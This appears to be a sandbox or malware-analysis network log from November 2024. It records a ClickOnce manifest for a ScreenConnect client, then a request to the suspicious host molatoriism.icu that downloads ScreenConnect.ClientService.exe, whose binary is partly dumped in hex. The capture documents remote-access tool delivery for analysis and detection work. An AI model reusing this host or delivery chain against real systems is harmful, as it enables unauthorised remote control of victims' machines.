                                                                                                                                                                                                Data Ascii: 4000<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmln
                                                                                                                                                                                                2024-11-07 16:55:58 UTC1369INData Raw: 63 74 2e 57 69 6e 64 6f 77 73 43 6c 69 65 6e 74 2e 65 78 65 22 20 76 65 72 73 69 6f 6e 3d 22 32 34 2e 32 2e 31 30 2e 38 39 39 31 22 20 70 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 22 32 35 62 30 66 62 62 36 65 66 37 65 62 30 39 34 22 20 6c 61 6e 67 75 61 67 65 3d 22 6e 65 75 74 72 61 6c 22 20 70 72 6f 63 65 73 73 6f 72 41 72 63 68 69 74 65 63 74 75 72 65 3d 22 6d 73 69 6c 22 20 74 79 70 65 3d 22 77 69 6e 33 32 22 20 2f 3e 0d 0a 20 20 3c 61 70 70 6c 69 63 61 74 69 6f 6e 20 2f 3e 0d 0a 20 20 3c 65 6e 74 72 79 50 6f 69 6e 74 3e 0d 0a 20 20 20 20 3c 61 73 73 65 6d 62 6c 79 49 64 65 6e 74 69 74 79 20 6e 61 6d 65 3d 22 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 43 6c 69 65 6e 74 22 20 76 65 72 73 69 6f 6e 3d 22 32 34 2e 32 2e 31 30 2e 38 39
                                                                                                                                                                                                Data Ascii: ct.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" /> <application /> <entryPoint> <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.89
                                                                                                                                                                                                2024-11-07 16:55:58 UTC1369INData Raw: 65 70 65 6e 64 65 6e 63 79 3e 0d 0a 20 20 3c 64 65 70 65 6e 64 65 6e 63 79 3e 0d 0a 20 20 20 20 3c 64 65 70 65 6e 64 65 6e 74 41 73 73 65 6d 62 6c 79 20 64 65 70 65 6e 64 65 6e 63 79 54 79 70 65 3d 22 69 6e 73 74 61 6c 6c 22 20 61 6c 6c 6f 77 44 65 6c 61 79 65 64 42 69 6e 64 69 6e 67 3d 22 74 72 75 65 22 20 63 6f 64 65 62 61 73 65 3d 22 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 43 6c 69 65 6e 74 2e 64 6c 6c 22 20 73 69 7a 65 3d 22 31 39 37 31 32 30 22 3e 0d 0a 20 20 20 20 20 20 3c 61 73 73 65 6d 62 6c 79 49 64 65 6e 74 69 74 79 20 6e 61 6d 65 3d 22 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 43 6c 69 65 6e 74 22 20 76 65 72 73 69 6f 6e 3d 22 32 34 2e 32 2e 31 30 2e 38 39 39 31 22 20 70 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 22 34 42 31 34 43 30 31 35 43
                                                                                                                                                                                                Data Ascii: ependency> <dependency> <dependentAssembly dependencyType="install" allowDelayedBinding="true" codebase="ScreenConnect.Client.dll" size="197120"> <assemblyIdentity name="ScreenConnect.Client" version="24.2.10.8991" publicKeyToken="4B14C015C
                                                                                                                                                                                                2024-11-07 16:55:58 UTC1369INData Raw: 20 3c 2f 64 65 70 65 6e 64 65 6e 63 79 3e 0d 0a 20 20 3c 64 65 70 65 6e 64 65 6e 63 79 3e 0d 0a 20 20 20 20 3c 64 65 70 65 6e 64 65 6e 74 41 73 73 65 6d 62 6c 79 20 64 65 70 65 6e 64 65 6e 63 79 54 79 70 65 3d 22 69 6e 73 74 61 6c 6c 22 20 61 6c 6c 6f 77 44 65 6c 61 79 65 64 42 69 6e 64 69 6e 67 3d 22 74 72 75 65 22 20 63 6f 64 65 62 61 73 65 3d 22 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 43 6f 72 65 2e 64 6c 6c 22 20 73 69 7a 65 3d 22 35 34 38 38 36 34 22 3e 0d 0a 20 20 20 20 20 20 3c 61 73 73 65 6d 62 6c 79 49 64 65 6e 74 69 74 79 20 6e 61 6d 65 3d 22 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 43 6f 72 65 22 20 76 65 72 73 69 6f 6e 3d 22 32 34 2e 32 2e 31 30 2e 38 39 39 31 22 20 70 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 22 34 42 31 34 43 30 31 35 43
                                                                                                                                                                                                Data Ascii: </dependency> <dependency> <dependentAssembly dependencyType="install" allowDelayedBinding="true" codebase="ScreenConnect.Core.dll" size="548864"> <assemblyIdentity name="ScreenConnect.Core" version="24.2.10.8991" publicKeyToken="4B14C015C
                                                                                                                                                                                                2024-11-07 16:55:58 UTC1369INData Raw: 6e 63 79 3e 0d 0a 20 20 3c 64 65 70 65 6e 64 65 6e 63 79 3e 0d 0a 20 20 20 20 3c 64 65 70 65 6e 64 65 6e 74 41 73 73 65 6d 62 6c 79 20 64 65 70 65 6e 64 65 6e 63 79 54 79 70 65 3d 22 69 6e 73 74 61 6c 6c 22 20 61 6c 6c 6f 77 44 65 6c 61 79 65 64 42 69 6e 64 69 6e 67 3d 22 74 72 75 65 22 20 63 6f 64 65 62 61 73 65 3d 22 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 43 6c 69 65 6e 74 2e 65 78 65 22 20 73 69 7a 65 3d 22 36 30 31 33 37 36 22 3e 0d 0a 20 20 20 20 20 20 3c 61 73 73 65 6d 62 6c 79 49 64 65 6e 74 69 74 79 20 6e 61 6d 65 3d 22 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 43 6c 69 65 6e 74 22 20 76 65 72 73 69 6f 6e 3d 22 32 34 2e 32 2e 31 30 2e 38 39 39 31 22 20 70 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 22 34
                                                                                                                                                                                                Data Ascii: ncy> <dependency> <dependentAssembly dependencyType="install" allowDelayedBinding="true" codebase="ScreenConnect.WindowsClient.exe" size="601376"> <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4
                                                                                                                                                                                                2024-11-07 16:55:58 UTC1369INData Raw: 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 73 68 61 31 22 20 2f 3e 0d 0a 20 20 20 20 20 20 3c 64 73 69 67 3a 44 69 67 65 73 74 56 61 6c 75 65 3e 4f 4f 71 32 36 64 6d 62 58 4b 37 73 6c 77 4f 49 54 53 57 2b 6a 59 45 57 49 4b 6b 3d 3c 2f 64 73 69 67 3a 44 69 67 65 73 74 56 61 6c 75 65 3e 0d 0a 20 20 20 20 3c 2f 68 61 73 68 3e 0d 0a 20 20 3c 2f 66 69 6c 65 3e 0d 0a 20 20 3c 66 69 6c 65 20 6e 61 6d 65 3d 22 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 42 61 63 6b 73 74 61 67 65 53 68 65 6c 6c 2e 65 78 65 2e 63 6f 6e 66 69 67 22 20 73 69 7a 65 3d 22 32 36 36 22 3e 0d 0a 20 20 20 20 3c 68 61 73 68 3e 0d 0a 20 20 20 20 20 20 3c 64 73 69 67 3a 54 72 61 6e 73 66 6f 72 6d 73 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 73 69 67 3a 54 72 61 6e 73 66
                                                                                                                                                                                                Data Ascii: 2000/09/xmldsig#sha1" /> <dsig:DigestValue>OOq26dmbXK7slwOITSW+jYEWIKk=</dsig:DigestValue> </hash> </file> <file name="ScreenConnect.WindowsBackstageShell.exe.config" size="266"> <hash> <dsig:Transforms> <dsig:Transf
                                                                                                                                                                                                2024-11-07 16:55:58 UTC1369INData Raw: 65 78 65 2e 63 6f 6e 66 69 67 22 20 73 69 7a 65 3d 22 32 36 36 22 3e 0d 0a 20 20 20 20 3c 68 61 73 68 3e 0d 0a 20 20 20 20 20 20 3c 64 73 69 67 3a 54 72 61 6e 73 66 6f 72 6d 73 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 73 69 67 3a 54 72 61 6e 73 66 6f 72 6d 20 41 6c 67 6f 72 69 74 68 6d 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 48 61 73 68 54 72 61 6e 73 66 6f 72 6d 73 2e 49 64 65 6e 74 69 74 79 22 20 2f 3e 0d 0a 20 20 20 20 20 20 3c 2f 64 73 69 67 3a 54 72 61 6e 73 66 6f 72 6d 73 3e 0d 0a 20 20 20 20 20 20 3c 64 73 69 67 3a 44 69 67 65 73 74 4d 65 74 68 6f 64 20 41 6c 67 6f 72 69 74 68 6d 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 39 2f 78 6d 6c 64 73 69 67 23 73 68 61 31 22 20 2f
                                                                                                                                                                                                Data Ascii: exe.config" size="266"> <hash> <dsig:Transforms> <dsig:Transform Algorithm="urn:schemas-microsoft-com:HashTransforms.Identity" /> </dsig:Transforms> <dsig:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1" /
                                                                                                                                                                                                2024-11-07 16:55:58 UTC1369INData Raw: 7a 78 48 36 63 41 56 49 38 55 78 62 6e 72 4a 71 48 58 4d 77 38 58 52 4f 30 46 63 55 4e 51 78 58 41 39 70 49 52 57 72 43 6e 4b 41 6a 74 6a 7a 6d 6b 4c 6d 4d 2b 68 42 2f 6f 4f 53 2f 56 58 41 41 75 75 73 69 42 79 70 37 6d 2b 6c 6f 77 2f 5a 47 68 2b 74 66 43 73 42 4b 30 2b 6c 76 51 2f 38 52 6d 61 30 43 70 53 7a 76 76 76 2b 4b 66 35 6f 39 51 64 64 5a 4f 2f 6b 33 7a 71 4e 58 44 72 33 6c 64 35 45 32 75 79 48 68 68 59 56 73 75 30 6c 52 37 6c 44 43 57 6f 61 31 4a 52 52 61 56 63 4b 30 46 54 4d 58 2f 6e 30 39 75 55 31 39 69 48 33 51 66 42 52 65 4c 45 67 4d 75 4a 6a 65 48 72 61 44 53 39 6b 63 6f 53 6d 42 5a 30 42 5a 78 6c 4d 4c 79 4b 55 73 69 68 76 72 65 74 76 63 35 4b 56 78 79 4e 47 32 56 34 4d 6c 64 4b 52 43 76 59 39 76 46 76 50 35 77 31 6b 36 50 47 46 50 42 6a 34
                                                                                                                                                                                                Data Ascii: zxH6cAVI8UxbnrJqHXMw8XRO0FcUNQxXA9pIRWrCnKAjtjzmkLmM+hB/oOS/VXAAuusiByp7m+low/ZGh+tfCsBK0+lvQ/8Rma0CpSzvvv+Kf5o9QddZO/k3zqNXDr3ld5E2uyHhhYVsu0lR7lDCWoa1JRRaVcK0FTMX/n09uU19iH3QfBReLEgMuJjeHraDS9kcoSmBZ0BZxlMLyKUsihvretvc5KVxyNG2V4MldKRCvY9vFvP5w1k6PGFPBj4
                                                                                                                                                                                                2024-11-07 16:55:58 UTC1369INData Raw: 3a 6d 70 65 67 3a 6d 70 65 67 32 31 3a 32 30 30 33 3a 30 31 2d 52 45 4c 2d 52 2d 4e 53 22 20 78 6d 6c 6e 73 3a 61 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 69 6e 64 6f 77 73 2f 70 6b 69 2f 32 30 30 35 2f 41 75 74 68 65 6e 74 69 63 6f 64 65 22 3e 3c 72 3a 67 72 61 6e 74 3e 3c 61 73 3a 4d 61 6e 69 66 65 73 74 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 48 61 73 68 3d 22 38 62 31 32 63 31 65 34 38 38 32 34 65 62 31 63 30 33 63 37 32 31 61 64 35 30 65 32 37 39 64 31 64 36 30 32 62 63 39 35 22 20 44 65 73 63 72 69 70 74 69 6f 6e 3d 22 22 20 55 72 6c 3d 22 22 3e 3c 61 73 3a 61 73 73 65 6d 62 6c 79 49 64 65 6e 74 69 74 79 20 6e 61 6d 65 3d 22 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 43 6c 69
                                                                                                                                                                                                Data Ascii: :mpeg:mpeg21:2003:01-REL-R-NS" xmlns:as="http://schemas.microsoft.com/windows/pki/2005/Authenticode"><r:grant><as:ManifestInformation Hash="8b12c1e48824eb1c03c721ad50e279d1d602bc95" Description="" Url=""><as:assemblyIdentity name="ScreenConnect.WindowsCli
                                                                                                                                                                                                2024-11-07 16:55:58 UTC1369INData Raw: 38 4a 67 4c 30 45 4c 2f 4c 6b 6e 72 74 6c 4f 41 36 36 57 4e 61 76 31 65 58 65 5a 43 76 64 6b 6f 4f 34 43 73 43 41 73 79 51 61 59 46 74 7a 77 79 65 56 4e 48 64 48 53 36 38 47 4b 41 74 44 65 6d 49 36 30 38 69 70 66 71 37 57 63 4f 43 51 4b 46 44 44 57 6a 44 51 43 77 62 4a 6a 77 33 62 6f 66 79 41 53 4e 70 45 46 55 74 66 73 46 68 66 4e 49 45 45 70 55 32 46 53 71 66 51 75 49 39 7a 7a 77 33 2f 31 66 7a 65 36 4e 79 71 59 69 47 58 78 74 75 6a 46 52 38 38 49 31 72 70 4e 37 5a 51 75 48 55 4d 52 30 31 6e 4f 44 57 59 58 70 47 43 65 4f 35 65 74 36 36 45 43 73 73 69 4d 64 76 6d 31 44 42 6d 4a 49 77 64 61 35 36 63 69 5a 6f 37 6c 58 52 33 4a 6a 2b 38 41 67 53 59 61 75 70 35 33 57 62 7a 62 71 31 4b 41 6a 78 71 76 44 6d 37 59 77 75 35 47 43 4b 77 41 70 36 6a 49 73 54 44 74
                                                                                                                                                                                                Data Ascii: 8JgL0EL/LknrtlOA66WNav1eXeZCvdkoO4CsCAsyQaYFtzwyeVNHdHS68GKAtDemI608ipfq7WcOCQKFDDWjDQCwbJjw3bofyASNpEFUtfsFhfNIEEpU2FSqfQuI9zzw3/1fze6NyqYiGXxtujFR88I1rpN7ZQuHUMR01nODWYXpGCeO5et66ECssiMdvm1DBmJIwda56ciZo7lXR3Jj+8AgSYaup53Wbzbq1KAjxqvDm7Ywu5GCKwAp6jIsTDt


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                2192.168.2.949795104.21.96.1484437480C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-07 16:56:04 UTC123OUTGET /Bin/ScreenConnect.ClientService.exe HTTP/1.1
                                                                                                                                                                                                Host: molatoriism.icu
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                2024-11-07 16:56:04 UTC789INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Thu, 07 Nov 2024 16:56:04 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                CF-Cache-Status: BYPASS
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XXxX945VAfaRzT94qNr0NLjPDarLRDiCl7LytkF0Nnq5fjFR4o5nSyqbljgCYimD4rurnWKj2BIl8mfoG%2FxBvAa8ochvtGVPQNn0XOVPfYpu1%2Bwxeaa1qrdnbl4pbbuF6Gg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                CF-RAY: 8deedac20efce759-DEN
                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=18982&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=714&delivery_rate=152710&cwnd=32&unsent_bytes=0&cid=50f45b5e183c2136&ts=767&x=0"
                                                                                                                                                                                                2024-11-07 16:56:04 UTC580INData Raw: 37 38 61 63 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f8 10 28 a3 bc 71 46 f0 bc 71 46 f0 bc 71 46 f0 08 ed b7 f0 b6 71 46 f0 08 ed b5 f0 c6 71 46 f0 08 ed b4 f0 a4 71 46 f0 3c 0a 42 f1 ad 71 46 f0 3c 0a 45 f1 a8 71 46 f0 3c 0a 43 f1 96 71 46 f0 b5 09 d5 f0 b6 71 46 f0 a2 23 d5 f0 bf 71 46 f0 bc 71 47 f0 cc 71 46 f0 32 0a 4f f1 bd 71 46 f0 32 0a b9 f0 bd 71 46 f0 32 0a 44 f1 bd 71 46 f0 52 69 63 68 bc 71 46 f0 00
                                                                                                                                                                                                Data Ascii: 78acMZ@!L!This program cannot be run in DOS mode.$(qFqFqFqFqFqF<BqF<EqF<CqFqF#qFqGqF2OqF2qF2DqFRichqF
                                                                                                                                                                                                2024-11-07 16:56:04 UTC1369INData Raw: 00 00 00 68 00 00 00 c4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 84 12 00 00 00 40 01 00 00 0a 00 00 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 58 04 00 00 00 60 01 00 00 06 00 00 00 36 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c0 0f 00 00 00 70 01 00 00 10 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                Data Ascii: h@@.data@,@.rsrcX`6@@.relocp<@B
                                                                                                                                                                                                2024-11-07 16:56:04 UTC1369INData Raw: 85 c0 75 f5 2b ca 8d 85 e0 fd ff ff d1 f9 68 30 1f 41 00 8d 04 48 50 ff d6 6a 01 6a 00 6a 0c ff 15 60 d1 40 00 6a 04 89 85 d4 fb ff ff e8 49 0b 00 00 8b 35 64 d1 40 00 83 c4 04 89 85 d0 fb ff ff c7 00 00 00 00 00 33 c0 66 89 85 a0 fb ff ff 8d 85 a0 fb ff ff 50 ff d6 85 c0 0f 88 d5 02 00 00 b8 08 00 00 00 66 89 85 a0 fb ff ff 8d 85 e0 fd ff ff 50 ff d7 89 85 a8 fb ff ff 85 c0 0f 84 b8 02 00 00 8d 85 a0 fb ff ff 50 ff b5 d0 fb ff ff ff b5 d4 fb ff ff ff 15 5c d1 40 00 8d 85 a0 fb ff ff 50 ff d6 8b 35 50 d1 40 00 8d 85 80 fb ff ff 0f 57 c0 50 0f 11 85 80 fb ff ff ff d6 8b 85 c4 fb ff ff 0f 57 c0 89 85 d0 fb ff ff 8d 85 a0 fb ff ff 50 0f 11 85 a0 fb ff ff ff d6 c6 45 fc 0a 0f 10 85 a0 fb ff ff 68 3c 1f 41 00 0f 11 85 70 fb ff ff ff d7 8b f0 89 b5 94 fb ff ff
                                                                                                                                                                                                Data Ascii: u+h0AHPjjj`@jI5d@3fPfPP\@P5P@WPWPEh<Ap
                                                                                                                                                                                                2024-11-07 16:56:04 UTC1369INData Raw: 89 85 d8 fd ff ff 85 c0 75 08 85 f6 0f 85 d3 00 00 00 8d 85 d0 fd ff ff 50 ff b5 a0 fd ff ff ff b5 a4 fd ff ff ff 15 5c d1 40 00 8b f0 8d 85 d0 fd ff ff 50 ff 15 64 d1 40 00 85 f6 78 45 8d 85 90 fd ff ff 0f 57 c0 50 0f 11 85 90 fd ff ff ff 15 50 d1 40 00 8b 95 a4 fd ff ff 8d 85 90 fd ff ff 50 b9 8c 1f 41 00 c7 45 fc 00 00 00 00 e8 8d f7 ff ff 83 c4 04 8d 85 90 fd ff ff 50 ff 15 64 d1 40 00 8d 85 a8 fd ff ff c7 85 ac fd ff ff 01 00 00 00 50 57 c7 85 b0 fd ff ff 00 00 00 00 ff 15 14 d0 40 00 8b 3d 38 d0 40 00 33 f6 0f 1f 00 ff b4 b5 c4 fd ff ff ff d7 46 83 fe 03 72 f1 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 8b 4d ec 33 cd e8 ed 02 00 00 8b e5 5d 8b e3 5b c2 08 00 50 e8 5b f6 ff ff b8 0a 00 00 00 c7 85 d8 fd ff ff 0e 00 07 80 68 0e 00 07 80 66 89 85 d0 fd ff
                                                                                                                                                                                                Data Ascii: uP\@Pd@xEWPP@PAEPd@PW@=8@3FrMdY_^M3][P[hf
                                                                                                                                                                                                2024-11-07 16:56:04 UTC1369INData Raw: 74 27 83 78 24 00 7c 21 c7 45 fc fe ff ff ff b0 01 eb 1f 8b 45 ec 8b 00 33 c9 81 38 05 00 00 c0 0f 94 c1 8b c1 c3 8b 65 e8 c7 45 fc fe ff ff ff 32 c0 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b c9 c3 55 8b ec e8 f3 05 00 00 85 c0 74 0f 80 7d 08 00 75 09 33 c0 b9 78 48 41 00 87 01 5d c3 55 8b ec 80 3d 7c 48 41 00 00 74 06 80 7d 0c 00 75 12 ff 75 08 e8 23 40 00 00 ff 75 08 e8 5f 17 00 00 59 59 b0 01 5d c3 55 8b ec 83 3d 80 48 41 00 ff ff 75 08 75 07 e8 6a 3e 00 00 eb 0b 68 80 48 41 00 e8 ce 3e 00 00 59 f7 d8 59 1b c0 f7 d0 23 45 08 5d c3 55 8b ec ff 75 08 e8 c8 ff ff ff f7 d8 59 1b c0 f7 d8 48 5d c3 55 8b ec 5d e9 e9 07 00 00 55 8b ec f6 45 08 01 56 8b f1 c7 06 78 d2 40 00 74 0a 6a 0c 56 e8 ff 07 00 00 59 59 8b c6 5e 5d c2 04 00 56 6a 02 e8 b7 3f 00 00 e8 8f
                                                                                                                                                                                                Data Ascii: t'x$|!EE38eE2MdY_^[Ut}u3xHA]U=|HAt}uu#@u_YY]U=HAuuj>hHA>YY#E]UuYH]U]UEVx@tjVYY^]Vj?
                                                                                                                                                                                                2024-11-07 16:56:04 UTC1369INData Raw: 04 89 4b 08 8b 4d fc 89 53 0c 8b 5d e0 f7 c3 00 02 00 00 74 0e 83 cf 02 89 3d b8 4b 41 00 eb 03 8b 5d f0 a1 0c 40 41 00 83 c8 02 c7 05 b4 4b 41 00 01 00 00 00 a3 0c 40 41 00 f7 c1 00 00 10 00 0f 84 93 00 00 00 83 c8 04 c7 05 b4 4b 41 00 02 00 00 00 a3 0c 40 41 00 f7 c1 00 00 00 08 74 79 f7 c1 00 00 00 10 74 71 33 c9 0f 01 d0 89 45 ec 89 55 f0 8b 45 ec 8b 4d f0 6a 06 5e 23 c6 3b c6 75 57 a1 0c 40 41 00 83 c8 08 c7 05 b4 4b 41 00 03 00 00 00 a3 0c 40 41 00 f6 c3 20 74 3b 83 c8 20 c7 05 b4 4b 41 00 05 00 00 00 a3 0c 40 41 00 b8 00 00 03 d0 23 d8 3b d8 75 1e 8b 45 ec ba e0 00 00 00 8b 4d f0 23 c2 3b c2 75 0d 83 0d 0c 40 41 00 40 89 35 b4 4b 41 00 5f 5e 5b 33 c0 c9 c3 33 c0 40 c3 33 c0 39 05 78 52 41 00 0f 95 c0 c3 55 8b ec 81 ec 24 03 00 00 53 6a 17 ff 15 bc
                                                                                                                                                                                                Data Ascii: KMS]t=KA]@AKA@AKA@Atytq3EUEMj^#;uW@AKA@A t; KA@A#;uEM#;u@A@5KA_^[33@39xRAU$Sj
                                                                                                                                                                                                2024-11-07 16:56:04 UTC1369INData Raw: 8b c1 83 61 08 00 c7 41 04 cc d2 40 00 c7 01 c4 d2 40 00 c3 55 8b ec 56 8b f1 8d 46 04 c7 06 88 d2 40 00 83 20 00 83 60 04 00 50 8b 45 08 83 c0 04 50 e8 e8 0e 00 00 59 59 8b c6 5e 5d c2 04 00 8d 41 04 c7 01 88 d2 40 00 50 e8 33 0f 00 00 59 c3 55 8b ec 56 8b f1 8d 46 04 c7 06 88 d2 40 00 50 e8 1c 0f 00 00 f6 45 08 01 59 74 0a 6a 0c 56 e8 c4 fd ff ff 59 59 8b c6 5e 5d c2 04 00 55 8b ec 83 ec 0c 8d 4d f4 e8 3d ff ff ff 68 3c 29 41 00 8d 45 f4 50 e8 07 0f 00 00 cc 55 8b ec 83 ec 0c 8d 4d f4 e8 53 ff ff ff 68 90 29 41 00 8d 45 f4 50 e8 ea 0e 00 00 cc 8b 41 04 85 c0 75 05 b8 90 d2 40 00 c3 55 8b ec 51 8b 45 18 8b 4d 1c 53 56 8b 58 10 57 8b 78 0c 8b d7 89 55 fc 8b f2 85 c9 78 2d 6b c2 14 83 c3 08 03 c3 8b 5d 10 83 fa ff 74 3c 83 e8 14 4a 39 58 fc 7d 04 3b 18 7e
                                                                                                                                                                                                Data Ascii: aA@@UVF@ `PEPYY^]A@P3YUVF@PEYtjVYY^]UM=h<)AEPUMSh)AEPAu@UQEMSVXWxUx-k]t<J9X};~
                                                                                                                                                                                                2024-11-07 16:56:04 UTC1369INData Raw: 81 7e 14 22 05 93 19 74 06 5f 5e 33 c0 5d c3 e8 bc 0a 00 00 89 70 10 8b 77 04 e8 b1 0a 00 00 89 70 14 e8 47 33 00 00 cc 55 8b ec e8 a0 0a 00 00 8b 40 24 85 c0 74 0e 8b 4d 08 39 08 74 0c 8b 40 04 85 c0 75 f5 33 c0 40 5d c3 33 c0 5d c3 55 8b ec 8b 4d 0c 8b 55 08 56 8b 01 8b 71 04 03 c2 85 f6 78 0d 8b 49 08 8b 14 16 8b 0c 0a 03 ce 03 c1 5e 5d c3 55 8b ec 56 8b 75 08 57 8b 3e 81 3f 52 43 43 e0 74 12 81 3f 4d 4f 43 e0 74 0a 81 3f 63 73 6d e0 74 1b eb 13 e8 34 0a 00 00 83 78 18 00 7e 08 e8 29 0a 00 00 ff 48 18 5f 33 c0 5e 5d c3 e8 1b 0a 00 00 89 78 10 8b 76 04 e8 10 0a 00 00 89 70 14 e8 a6 32 00 00 cc e8 02 0a 00 00 83 c0 10 c3 e8 f9 09 00 00 83 c0 14 c3 cc 57 56 8b 74 24 10 8b 4c 24 14 8b 7c 24 0c 8b c1 8b d1 03 c6 3b fe 76 08 3b f8 0f 82 94 02 00 00 83 f9 20
                                                                                                                                                                                                Data Ascii: ~"t_^3]pwpG3U@$tM9t@u3@]3]UMUVqxI^]UVuW>?RCCt?MOCt?csmt4x~)H_3^]xvp2WVt$L$|$;v;
                                                                                                                                                                                                2024-11-07 16:56:04 UTC1369INData Raw: 20 66 0f 6f 5e 30 66 0f 7f 07 66 0f 7f 4f 10 66 0f 7f 57 20 66 0f 7f 5f 30 66 0f 6f 66 40 66 0f 6f 6e 50 66 0f 6f 76 60 66 0f 6f 7e 70 66 0f 7f 67 40 66 0f 7f 6f 50 66 0f 7f 77 60 66 0f 7f 7f 70 8d b6 80 00 00 00 8d bf 80 00 00 00 4a 75 a3 85 c9 74 5f 8b d1 c1 ea 05 85 d2 74 21 8d 9b 00 00 00 00 f3 0f 6f 06 f3 0f 6f 4e 10 f3 0f 7f 07 f3 0f 7f 4f 10 8d 76 20 8d 7f 20 4a 75 e5 83 e1 1f 74 30 8b c1 c1 e9 02 74 0f 8b 16 89 17 83 c7 04 83 c6 04 83 e9 01 75 f1 8b c8 83 e1 03 74 13 8a 06 88 07 46 47 49 75 f7 8d a4 24 00 00 00 00 8d 49 00 8b 44 24 0c 5e 5f c3 8d a4 24 00 00 00 00 8b ff ba 10 00 00 00 2b d0 2b ca 51 8b c2 8b c8 83 e1 03 74 09 8a 16 88 17 46 47 49 75 f7 c1 e8 02 74 0d 8b 16 89 17 8d 76 04 8d 7f 04 48 75 f3 59 e9 e9 fe ff ff cc cc cc cc cc cc cc cc
                                                                                                                                                                                                Data Ascii: fo^0ffOfW f_0fof@fonPfov`fo~pfg@foPfw`fpJut_t!ooNOv Jut0tutFGIu$ID$^_$++QtFGIutvHuY
